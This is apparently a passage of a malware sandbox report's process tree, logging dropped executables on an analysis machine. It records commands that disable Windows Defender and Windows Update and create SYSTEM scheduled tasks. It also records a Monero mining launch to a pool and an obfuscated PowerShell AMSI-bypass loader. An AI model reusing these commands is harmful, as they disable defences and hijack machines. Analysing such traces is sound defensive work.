                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          PID:5508
                                                                                                        • C:\Windows\rss\csrss.exe
                                                                                                          C:\Windows\rss\csrss.exe
                                                                                                          8⤵
                                                                                                            PID:4368
                                                                                                      • C:\Users\Admin\Pictures\UC7MeipgvBChHBZfkuFTGOXc.exe
                                                                                                        "C:\Users\Admin\Pictures\UC7MeipgvBChHBZfkuFTGOXc.exe"
                                                                                                        6⤵
                                                                                                          PID:6040
                                                                                                        • C:\Users\Admin\Pictures\jStiBOucElA53IENNVsahgYU.exe
                                                                                                          "C:\Users\Admin\Pictures\jStiBOucElA53IENNVsahgYU.exe"
                                                                                                          6⤵
                                                                                                            PID:6072
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS27C.tmp\Install.exe
                                                                                                              .\Install.exe /tEdidDDf "385118" /S
                                                                                                              7⤵
                                                                                                                PID:1132
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                  8⤵
                                                                                                                    PID:5860
                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                      9⤵
                                                                                                                        PID:6140
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                          10⤵
                                                                                                                            PID:5184
                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                              11⤵
                                                                                                                                PID:5208
                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                            forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                            9⤵
                                                                                                                              PID:1348
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                10⤵
                                                                                                                                  PID:5404
                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                9⤵
                                                                                                                                  PID:3772
                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                  forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                  9⤵
                                                                                                                                    PID:2684
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                      10⤵
                                                                                                                                        PID:5152
                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                          11⤵
                                                                                                                                            PID:4224
                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                        9⤵
                                                                                                                                          PID:3988
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                            10⤵
                                                                                                                                              PID:5992
                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                11⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                PID:5972
                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                                                                                          8⤵
                                                                                                                                            PID:2444
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                              9⤵
                                                                                                                                                PID:496
                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                                  10⤵
                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                  PID:5448
                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                              schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 02:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS27C.tmp\Install.exe\" it /CaadidaGfI 385118 /S" /V1 /F
                                                                                                                                              8⤵
                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                              PID:5276
                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
                                                                                                                                              8⤵
                                                                                                                                                PID:5956
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                                                                                  9⤵
                                                                                                                                                    PID:6136
                                                                                                                                                    • \??\c:\windows\SysWOW64\schtasks.exe
                                                                                                                                                      schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                                                                                      10⤵
                                                                                                                                                        PID:5916
                                                                                                                                              • C:\Users\Admin\Pictures\RSpB6lFU0vsfpuBQmfubGmjq.exe
                                                                                                                                                "C:\Users\Admin\Pictures\RSpB6lFU0vsfpuBQmfubGmjq.exe"
                                                                                                                                                6⤵
                                                                                                                                                  PID:1676
                                                                                                                                                  • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                    7⤵
                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                    PID:3936
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                    7⤵
                                                                                                                                                      PID:1440
                                                                                                                                                      • C:\Windows\system32\wusa.exe
                                                                                                                                                        wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                        8⤵
                                                                                                                                                          PID:2156
                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                        C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                        7⤵
                                                                                                                                                        • Launches sc.exe
                                                                                                                                                        PID:856
                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                        C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                        7⤵
                                                                                                                                                        • Launches sc.exe
                                                                                                                                                        PID:352
                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                        C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                        7⤵
                                                                                                                                                        • Launches sc.exe
                                                                                                                                                        PID:5268
                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                        C:\Windows\system32\sc.exe stop bits
                                                                                                                                                        7⤵
                                                                                                                                                        • Launches sc.exe
                                                                                                                                                        PID:5516
                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                        C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                        7⤵
                                                                                                                                                        • Launches sc.exe
                                                                                                                                                        PID:6096
                                                                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                                                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                        7⤵
                                                                                                                                                          PID:5364
                                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                          7⤵
                                                                                                                                                            PID:5536
                                                                                                                                                          • C:\Windows\system32\powercfg.exe
                                                                                                                                                            C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                            7⤵
                                                                                                                                                              PID:5628
                                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                              7⤵
                                                                                                                                                                PID:3936
                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
                                                                                                                                                                7⤵
                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                PID:2856
                                                                                                                                                            • C:\Users\Admin\Pictures\YcH0BfUIUS92463LfTTeix0z.exe
                                                                                                                                                              "C:\Users\Admin\Pictures\YcH0BfUIUS92463LfTTeix0z.exe"
                                                                                                                                                              6⤵
                                                                                                                                                                PID:5460
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS2342.tmp\Install.exe
                                                                                                                                                                  .\Install.exe /tEdidDDf "385118" /S
                                                                                                                                                                  7⤵
                                                                                                                                                                    PID:5324
                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                                                                                                                      8⤵
                                                                                                                                                                        PID:5404
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                                                          9⤵
                                                                                                                                                                            PID:2872
                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                                                              10⤵
                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                              PID:5636
                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                          schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 02:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS2342.tmp\Install.exe\" it /HiSdidiupB 385118 /S" /V1 /F
                                                                                                                                                                          8⤵
                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                          PID:4852
                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
                                                                                                                                                                          8⤵
                                                                                                                                                                            PID:620
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                                                                                                              9⤵
                                                                                                                                                                                PID:1680
                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
                                                                                                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:5464
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000043001\Kaxhwswfup.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\1000043001\Kaxhwswfup.exe"
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:5552
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\$77d2a4ed
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\$77d2a4ed"
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:2852
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\$774354b6
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\$774354b6"
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:4556
                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3920 -ip 3920
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:1464
                                                                                                                                                                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                                                                          "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:4760
                                                                                                                                                                            • C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
                                                                                                                                                                              "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:1928
                                                                                                                                                                                • C:\Windows\Temp\881704.exe
                                                                                                                                                                                  "C:\Windows\Temp\881704.exe" --list-devices
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:3436
                                                                                                                                                                              • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                                                                                "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:4828
                                                                                                                                                                                  • C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
                                                                                                                                                                                    "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:4576
                                                                                                                                                                                  • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                                                                                    "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:2924
                                                                                                                                                                                      • C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
                                                                                                                                                                                        "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:2024
                                                                                                                                                                                          • C:\Windows\Temp\479931.exe
                                                                                                                                                                                            "C:\Windows\Temp\479931.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:3384
                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4796 -ip 4796
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:5616
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:5652
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:6092
                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4796 -ip 4796
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:856
                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5280 -ip 5280
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:5276
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4796 -ip 4796
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:5476
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4796 -ip 4796
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:5624
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4796 -ip 4796
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:5916
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4796 -ip 4796
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:1748
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4796 -ip 4796
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:6116
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4796 -ip 4796
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:5268
                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4796 -ip 4796
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:5616
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4796 -ip 4796
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:5620
                                                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:3632
                                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:5168
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 6004 -ip 6004
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:3424
                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:HvhuGrtxfImY{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ErurSYZWMqbmTC,[Parameter(Position=1)][Type]$iFeruCdaKl)$TTLZQWbkwyI=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+'l'+''+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+'D'+'e'+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+'Me'+[Char](109)+'o'+[Char](114)+''+[Char](121)+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType('MyD'+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+''+[Char](101)+'',''+[Char](67)+'l'+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+'c'+''+[Char](44)+''+'S'+''+'e'+'a'+[Char](108)+''+[Char](101)+''+[Char](100)+',A'+'n'+''+[Char](115)+'i'+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+''+'A'+''+[Char](117)+''+[Char](116)+'o'+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$TTLZQWbkwyI.DefineConstructor('R'+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+'c'+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+','+'H'+''+'i'+'d'+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+'g'+''+[Char](44)+''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$ErurSYZWMqbmTC).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+'n'+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');$TTLZQWbkwyI.DefineMethod(''+'I'+'n'+[Char](118)+'o'+[Char](107)+''+[Char](101)+'',''+[Char](80)+'u'+'b'+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+''+[Char](72)+'i'+'d'+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+'e'+'w'+''+[Char](83)+''+[Char](108)+'o'+'t'+''+','+'V'+[Char](105)+''+[Char](114)+''+'t'+'u'+'a'+''+'l'+'',$iFeruCdaKl,$ErurSYZWMqbmTC).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');Write-Output $TTLZQWbkwyI.CreateType();}$tHeGIkpwlhLNZ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+[Char](116)+''+'e'+''+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+'r'+[Char](111)+'s'+[Char](111)+''+'f'+''+[Char](116)+'.'+[Char](87)+''+'i'+''+[Char](110)+'3'+[Char](50)+''+'.'+''+'U'+''+'n'+''+[Char](115)+'a'+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+'e'+''+[Char](77)+'eth'+[Char](111)+''+'d'+''+[Char](115)+'');$yiuMXcLBuTAVfe=$tHeGIkpwlhLNZ.GetMethod('G'+[Char](101)+'t'+'P'+''+[Char](114)+''+[Char](111)+'c'+[Char](65)+'d'+'d'+''+'r'+''+'e'+'s'+'s'+'',[Reflection.BindingFlags](''+'P'+''+'u'+''+[Char](98)+''+'l'+'i'+[Char](99)+','+'S'+''+[Char](116)+''+[Char](97)+'t'+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$tuykDqAONIloUZaeKuS=HvhuGrtxfImY @([String])([IntPtr]);$wRsfHeILiSZfQNeyxJoEop=HvhuGrtxfImY @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$VHFjwSShIdm=$tHeGIkpwlhLNZ.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+'o'+[Char](100)+''+'u'+'l'+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+'d'+'l'+''+'e'+'').Invoke($Null,@([Object](''+'k'+'e'+[Char](114)+''+'n'+''+[Char](101)+'l'+[Char](51)+''+[Char](50)+''+'.'+''+'d'+'l'+'l'+'')));$vOfdQceZXnVrnr=$yiuMXcLBuTAVfe.Invoke($Null,@([Object]$VHFjwSShIdm,[Object]('L'+[Char](111)+''+'a'+'d'+[Char](76)+'i'+[Char](98)+'r'+[Char](97)+'ry'+[Char](65)+'')));$kEfiCYgkgWFuZWFFM=$yiuMXcLBuTAVfe.Invoke($Null,@([Object]$VHFjwSShIdm,[Object](''+[Char](86)+'ir'+[Char](116)+'ual'+'P'+''+[Char](114)+''+[Char](111)+'t'+[Char](101)+''+'c'+''+[Char](116)+'')));$tJlnQEM=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vOfdQceZXnVrnr,$tuykDqAONIloUZaeKuS).Invoke(''+[Char](97)+''+[Char](109)+'s'+'i'+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'');$KOoyMrgeFiIBfcPMA=$yiuMXcLBuTAVfe.Invoke($Null,@([Object]$tJlnQEM,[Object](''+[Char](65)+''+'m'+'si'+'S'+'c'+[Char](97)+''+[Char](110)+''+[Char](66)+'u'+'f'+''+'f'+'e'+[Char](114)+'')));$HzfebNgilY=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kEfiCYgkgWFuZWFFM,$wRsfHeILiSZfQNeyxJoEop).Invoke($KOoyMrgeFiIBfcPMA,[uint32]8,4,[ref]$HzfebNgilY);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$KOoyMrgeFiIBfcPMA,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kEfiCYgkgWFuZWFFM,$wRsfHeILiSZfQNeyxJoEop).Invoke($KOoyMrgeFiIBfcPMA,[uint32]8,0x20,[ref]$HzfebNgilY);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+'T'+[Char](87)+''+[Char](65)+''+'R'+''+'E'+'').GetValue(''+[Char](36)+''+'7'+''+'7'+''+[Char](115)+''+[Char](116)+'a'+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:524
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 6004 -ip 6004
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:396
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 6004 -ip 6004
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:4132
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6004 -ip 6004
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:4852
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 6004 -ip 6004
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:2536
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS27C.tmp\Install.exe
                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7zS27C.tmp\Install.exe it /CaadidaGfI 385118 /S
